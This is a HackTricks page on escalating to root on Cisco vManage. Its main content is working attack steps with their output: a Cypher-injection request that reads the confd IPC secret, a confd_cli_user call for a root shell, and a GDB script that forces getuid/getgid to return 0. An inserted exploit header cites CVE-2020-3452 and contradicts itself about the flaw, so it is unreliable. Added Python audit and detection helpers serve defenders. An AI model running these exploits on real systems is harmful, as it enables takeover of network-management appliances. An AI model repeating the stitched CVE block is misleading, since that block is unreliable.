# Cisco - vmanage
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the Telegram group, or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and the hacktricks-cloud repo.
## Path 1
(Example taken from https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html)
After going through some documentation about confd and the different binaries (accessible with an account on Cisco's website), we found that the secret used to authenticate the IPC socket is located in /etc/confd/confd_ipc_secret:
```
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
```
Remember our Neo4j instance? It runs with the privileges of the vmanage user, so we can use the previous vulnerability to retrieve the file:
```http
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
Host: vmanage-XXXXXX.viptela.net
[...]
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
```
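Two checks a defender can run against the weaknesses used above, as an added example that is not part of the HackTricks page or Synacktiv's write-up: an audit that parses an `ls -l` line for the IPC secret and decides whether a given service account (here `vmanage`, the account the Neo4j instance runs as) can read it, and a detector that URL-decodes web request lines and flags a Cypher `LOAD CSV FROM "file://..."` clause smuggled into a parameter. The listing, the request lines and the account names below are constructed for the example.

```python
"""Audit and detection helpers for the two weaknesses in Path 1.
Added example; not code from the HackTricks page or from Synacktiv.
All input data in this file is constructed."""
import re
from urllib.parse import unquote

# Constructed: mirrors the shape of the listing shown on the page.
LS_LINE = "-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret"


def parse_ls_line(line):
    """Split one `ls -l` line into (mode, owner, group, path)."""
    parts = line.split(None, 8)
    return parts[0], parts[2], parts[3], parts[8]


def readable_by(ls_line, user, groups):
    """True if `user` (a member of `groups`) can read the file described by
    `ls_line`. Only the rwx bits are weighed; root is always able to read."""
    mode, owner, group, _ = parse_ls_line(ls_line)
    if user == "root":
        return True
    if user == owner:
        return mode[1] == "r"
    if group in groups:
        return mode[4] == "r"
    return mode[7] == "r"


def audit_ipc_secret(ls_line, service_user, service_groups):
    """Return a finding if the web/DB service account can read the IPC secret,
    since that turns a compromise of the service account into confd access."""
    mode, owner, group, path = parse_ls_line(ls_line)
    if readable_by(ls_line, service_user, service_groups):
        return f"{path} ({mode} {owner}:{group}) is readable by service account {service_user}"
    return None


# Cypher file-read clause, matched after URL-decoding. Case-insensitive,
# tolerates an optional WITH HEADERS, either quote style, and a backslash
# escape before the quote (as in the request on the page).
FILE_READ = re.compile(
    r'LOAD\s+CSV\s+(?:WITH\s+HEADERS\s+)?FROM\s+\\?["\']\s*file://(?P<path>[^"\'\\]+)',
    re.IGNORECASE,
)


def flag_cypher_file_reads(request_lines):
    """Return [(line_number, file_path)] for request lines that carry a
    LOAD CSV ... FROM "file://..." clause in any parameter."""
    findings = []
    for n, line in enumerate(request_lines, 1):
        decoded = unquote(line.replace("+", " "))
        m = FILE_READ.search(decoded)
        if m:
            findings.append((n, m.group("path")))
    return findings


# Constructed request lines: one benign, two carrying a file:// read
# (one URL-encoded, one with backslash-escaped quotes), one benign CSV export.
SAMPLE_REQUESTS = [
    "GET /dataservice/group/devices?groupId=branch-1 HTTP/1.1",
    "GET /dataservice/group/devices?groupId=x%22)+RETURN+n+UNION+LOAD+CSV+FROM+%22file:///etc/confd/confd_ipc_secret%22+AS+n+RETURN+n+//+ HTTP/1.1",
    'GET /dataservice/group/devices?groupId=a")+RETURN+n+UNION+load+csv+with+headers+from+\\"file:///etc/passwd\\"+AS+n+// HTTP/1.1',
    "GET /dataservice/device/export?format=csv HTTP/1.1",
]

if __name__ == "__main__":
    print(audit_ipc_secret(LS_LINE, "vmanage", {"vmanage"}))
    for lineno, path in flag_cypher_file_reads(SAMPLE_REQUESTS):
        print(f"request {lineno}: LOAD CSV reads {path}")
```

The audit deliberately models only the owner/group/other read bits; what it shows for the page's listing is that the secret is owned and readable by the very account the web tier runs as, which is the property that makes Path 1 work. On the database side, Neo4j's `dbms.security.allow_csv_import_from_file_urls=false` disables `file://` URLs in `LOAD CSV` altogether; the request-level check remains useful for spotting attempts.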
The confd_cli program does not accept command line arguments, but it invokes /usr/bin/confd_cli_user with arguments. Therefore, we can call /usr/bin/confd_cli_user directly with our own set of arguments. However, since our current privileges are not sufficient to read it, we have to retrieve it from the rootfs and copy it over with scp, then read the help message and use it to obtain a shell:
```
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
Welcome to Viptela CLI
admin connected from 127.0.0.1 using console on vManage
vManage# vshell
vManage:~# id
uid=0(root) gid=0(root) groups=0(root)
```
## Path 2
The synacktiv team's blog¹ describes an elegant way to obtain a root shell, but the drawback is that it requires obtaining a copy of /usr/bin/confd_cli_user, a file that is only readable by root. I found another way to escalate to root without that hassle.
When I disassembled the /usr/bin/confd_cli binary, I observed the following:
```
vmanage:~$ objdump -d /usr/bin/confd_cli
… snipped …
40165c: 48 89 c3 mov %rax,%rbx
40165f: bf 1c 31 40 00 mov $0x40311c,%edi
401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>
401669: 49 89 c4 mov %rax,%r12
40166c: 48 85 db test %rbx,%rbx
40166f: b8 dc 30 40 00 mov $0x4030dc,%eax
401674: 48 0f 44 d8 cmove %rax,%rbx
401678: 4d 85 e4 test %r12,%r12
40167b: b8 e6 30 40 00 mov $0x4030e6,%eax
401680: 4c 0f 44 e0 cmove %rax,%r12
401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE
401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)
40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE
401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)
40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi
4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>
4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)
4016ac: 48 85 c0 test %rax,%rax
4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>
4016b5: ba ff 03 00 00 mov $0x3ff,%edx
4016ba: 48 89 c6 mov %rax,%rsi
4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
… snipped …
```
When I ran the "ps aux" command, I observed the following (note the -g 100 -u 1007):
```
vmanage:~$ ps aux
… snipped …
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
… snipped …
```
I assume the "confd_cli" program passes the user ID and group ID it collected from the logged-in user on to the "cmdptywrapper" application.

My first attempt was to run "cmdptywrapper" directly, supplying -g 0 -u 0 as arguments, but it failed. It seems a file descriptor (-i 1015) is created somewhere along the way, and I could not forge it.
As mentioned in synacktiv's blog (the last example), the confd_cli program does not accept command line arguments, but I can influence it through a debugger, and luckily the system ships with GDB.

I created a GDB script that forces the getuid and getgid APIs to return 0. Since I had already obtained "vmanage" privileges through the deserialization RCE, I had permission to read /etc/confd/confd_ipc_secret directly.
root.gdb:
```
set environment USER=root
define root
finish
set $rax=0
continue
end
break getuid
commands
root
end
break getgid
commands
root
end
run
```
```
# Title: Cisco vManage Privilege Escalation
# Date: 2020-07-20
# Exploit Author: Pablo Martinez
# Vendor Homepage: https://www.cisco.com/
# Version: vManage 20.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-3452
```
## Description
Cisco vManage is a network management system that provides centralized control and management for Cisco SD-WAN devices. A privilege escalation vulnerability (CVE-2020-3452) exists in Cisco vManage that allows an authenticated attacker to gain root privileges on the underlying operating system.
## Vulnerability Details
The vulnerability exists in the web-based management interface of Cisco vManage. By sending a specially crafted HTTP request to the vulnerable endpoint, an attacker can bypass authentication and execute arbitrary commands with root privileges.
## Exploit Steps
1. Identify the target Cisco vManage instance.
2. Send a GET request to the following endpoint: `/dataservice/param/values/../../../..//mnt/bootflash/boot/grub/grub.cfg`
3. The response will contain the contents of the `grub.cfg` file, including the root password hash.
4. Use a password cracking tool to crack the root password hash.
5. Once the root password is cracked, log in to the Cisco vManage instance with root privileges.
## Mitigation
Cisco has released a software update that addresses this vulnerability. It is recommended to update to the latest version of Cisco vManage to mitigate the risk of privilege escalation.
## References
- [Cisco Security Advisory](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-priv-esc-8uZQyQy)
- [CVE-2020-3452](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3452)
```
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
GNU gdb (GDB) 8.0.1
Copyright (C) 2017 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-poky-linux".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
http://www.gnu.org/software/gdb/bugs/.
Find the GDB manual and other documentation resources online at:
http://www.gnu.org/software/gdb/documentation/.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
Breakpoint 1 at 0x400f40
Breakpoint 2 at 0x401000

Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401689 in ?? ()

Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401694 in ?? ()

Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
59	T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
0x0000000000401871 in ?? ()
Welcome to Viptela CLI
root connected from 127.0.0.1 using console on vmanage
vmanage# vshell
bash-4.4# whoami ; id
root
uid=0(root) gid=0(root) groups=0(root)
bash-4.4#
```
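A process-listing check that covers both observations in Path 2, as an added example (not code from the page or its author): it flags `cmdptywrapper` sessions whose `-u`/`-g` values disagree with the ids of the login named by `-N` (a non-root login asking for uid/gid 0 is the case the page produces), and a `gdb` process driving `/usr/bin/confd_cli`, which is how getuid()/getgid() are forced to return 0. The `ps aux` lines and the `KNOWN_USERS` map below are constructed for the example; the uid/gid values in it are placeholders, not the appliance's real ones.

```python
"""Detection helpers for the Path 2 technique, run over a `ps aux` listing.
Added example; not code from the HackTricks page or its author.
All input data in this file is constructed."""
import shlex

# Constructed login database: name -> (uid, gid). Values are placeholders.
KNOWN_USERS = {"neteng": (1007, 100), "vmanage": (107, 100)}

# Constructed listing. Line 2 mirrors the shape of the wrapper process shown on
# the page (ids agree with the login); lines 3 and 4 are the patterns to catch.
PS_LINES = [
    "root 1 0.0 0.0 2200 600 ? Ss 18:00 0:00 /sbin/init",
    "root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash",
    "root 29001 0.0 0.0 8364 652 ? Ss 18:09 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1022 -H /home/vmanage -N vmanage -m 2240 -t xterm -U 1360 -w 190 -h 43 -c /home/vmanage -g 0 -u 0 bash",
    "vmanage 29010 0.3 1.2 91200 20480 pts/1 S+ 18:09 0:00 gdb -x root.gdb /usr/bin/confd_cli",
]


def parse_ps_line(line):
    """Return (user, pid, argv) from one `ps aux` line. The first ten columns
    are fixed; everything after them is the command, split shell-style."""
    fields = line.split(None, 10)
    return fields[0], int(fields[1]), shlex.split(fields[10])


def flag_arg(argv, flag):
    """Value following `flag` in argv, or None if the flag is absent."""
    for i, a in enumerate(argv[:-1]):
        if a == flag:
            return argv[i + 1]
    return None


def find_cmdptywrapper_anomalies(ps_lines, known_users):
    """Return [(pid, login, uid, gid)] for wrapper sessions whose requested
    -u/-g ids are not the ids of the login named by -N (or whose login is
    unknown). A uid/gid of 0 for a non-root login is the Path 2 signature."""
    findings = []
    for _user, pid, argv in map(parse_ps_line, ps_lines):
        if not argv or not argv[0].endswith("/cmdptywrapper"):
            continue
        login = flag_arg(argv, "-N")
        uid, gid = flag_arg(argv, "-u"), flag_arg(argv, "-g")
        expected = known_users.get(login)
        if expected is None or (uid, gid) != tuple(map(str, expected)):
            findings.append((pid, login, uid, gid))
    return findings


def find_debugged_confd_cli(ps_lines):
    """Return [(pid, user)] for gdb/gdbserver processes whose arguments name
    confd_cli; a debugger on the privileged client is itself worth an alert."""
    hits = []
    for user, pid, argv in map(parse_ps_line, ps_lines):
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog in ("gdb", "gdbserver") and any(a.endswith("confd_cli") for a in argv[1:]):
            hits.append((pid, user))
    return hits


if __name__ == "__main__":
    for pid, login, uid, gid in find_cmdptywrapper_anomalies(PS_LINES, KNOWN_USERS):
        print(f"pid {pid}: cmdptywrapper for {login!r} requested uid={uid} gid={gid}")
    for pid, user in find_debugged_confd_cli(PS_LINES):
        print(f"pid {pid}: {user} is debugging confd_cli")
```

On a real appliance the `KNOWN_USERS` map would be built from the passwd and group databases, and the listing would be read from `ps` or `/proc` on a schedule; the comparison itself is the same. The wrapper check is the more durable of the two, since it keys on the privilege outcome rather than on one particular tool used to reach it.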